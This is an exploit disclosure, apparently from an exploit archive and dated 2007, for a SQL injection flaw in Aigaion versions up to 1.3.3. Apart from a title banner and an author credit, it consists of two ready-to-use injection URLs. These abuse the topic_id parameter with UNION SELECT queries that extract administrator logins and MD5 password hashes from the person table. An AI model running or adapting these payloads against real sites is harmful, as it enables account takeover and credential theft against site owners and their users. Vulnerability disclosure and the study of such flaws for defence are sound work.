aigaion-sql.txt
Posted on 10 July 2007
--==+================================================================================+==-- --==+ Aigaion <= 1.3.3 SQL Injection Exploit +==-- --==+================================================================================+==-- DISCOVERED BY: Cody "CypherXero" Rester PAYLOAD: Admin username and MD5 Hash WEBSITE: http://www.cypherxero.net Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd. --==+================================================================================+==-- EXPLOITS: http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1-- http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--